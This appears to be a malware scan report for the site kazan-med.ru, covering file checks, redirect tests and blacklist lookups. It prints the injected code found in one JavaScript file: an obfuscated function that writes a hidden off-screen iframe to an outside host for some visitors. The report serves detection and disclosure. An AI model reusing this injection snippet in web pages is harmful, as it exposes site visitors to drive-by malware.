Scanned pages/files
Request | Server response | Status |
http://kazan-med.ru/ | 200 OK Content-Length: 84008 Content-Type: text/html | clean |
http://kazan-med.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 96965 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/media/system/js/core.js | 200 OK Content-Length: 5387 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 602 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/media/system/js/modal.js | 200 OK Content-Length: 10335 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/media/k2/assets/js/jquery-1.7.1.min.js | 200 OK Content-Length: 94471 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 7423 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function Argisuliterkas() {
  var dude = navigator.userAgent;
  var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1);
  if (!unificas) {
    document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');
  }
}
Argisuliterkas( $K2('.k2Scroller').css('width',($K2('.k2Scroller').find('.k2ScrollerElement:first').outerWidth(true))*$K2('.k2Scroller').children('.k2ScrollerElement').length);
});
// Equal block heights for the "default" view
$K2(window).load(function () {
  var blocks = $K2('.subCategory, .k2EqualHeights');
  var maxHeight = 0;
  blocks.each(function(){ maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height'))); });
  blocks.css('height', maxHeight);
});
Antivirus reports:
http://kazan-med.ru/media/system/js/caption.js | 200 OK Content-Length: 1332 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/templates/shaper_news_iii/js/tools.js | 200 OK Content-Length: 1343 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/plugins/system/helix/js/popbox.js | 200 OK Content-Length: 2197 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/plugins/system/helix/js/dropline.js | 200 OK Content-Length: 2573 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/plugins/system/helix/js/menu.js | 200 OK Content-Length: 5424 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/plugins/system/helix/js/totop.js | 200 OK Content-Length: 1601 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/modules/mod_sptab/assets/js/sptab.js | 200 OK Content-Length: 9741 Content-Type: application/x-javascript | clean |
http://kazan-med.ru/modules/mod_sp_simple_gallery/scripts/slimbox.js | 200 OK Content-Length: 5230 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kazan-med.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 05 Sep 2014 15:22:21 GMT
Server: nginx/1.2.9
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: cff96bf88edb371fe38f4df948452ca2=e99d8c909a782687f3b5612c400f165f; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: kazan-med.ru
Referer: http://www.google.com/search?q=kazan-med.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kazan-med.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kazan-med.ru/
Result: kazan-med.ru is not infected or malware details are not published yet.